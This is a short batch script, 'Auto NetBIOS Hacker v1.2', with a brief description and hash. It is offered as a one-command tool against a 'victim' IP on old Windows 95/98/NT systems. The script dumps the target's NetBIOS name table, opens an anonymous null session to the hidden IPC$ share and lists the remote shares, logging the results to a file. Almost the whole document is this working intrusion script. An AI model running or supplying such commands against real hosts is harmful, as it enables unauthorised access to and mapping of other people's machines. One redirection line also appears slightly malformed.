Auto NetBIOS Hacker for Windows 95/98/NT v1.2 - Gets the target's NetBIOS name-table, connects to the IPC$ hidden null share and gives you the available shares of the target with one single command.
d5ac027d7e443a64c99c38242be6797cde475d6b152f1f010b431156474133aa
cls
@echo off
echo Auto NetBIOS Hacker 1.2 for Windows 95/98/NT - By Neon-Lenz
echo -----------------------------------------------------------
echo How to use Auto NetBIOS Hacker: netbios "ipofvictim"
echo This little proggie will get you the NetBIOS name-table
echo of the target, a connection to the target's hidden IPC$
echo null share and the available remote shares of the target.
echo The results are automatically saved into result.txt, it
echo should be in the directory where you have put netbios.bat.
echo Neon-Lenz - neonlenz@ellicit.org
nbtstat -a %1 > result.txt
net use \\%1\ipc$ " /user:" >> result.txt
net view \\%1 >>> result.txt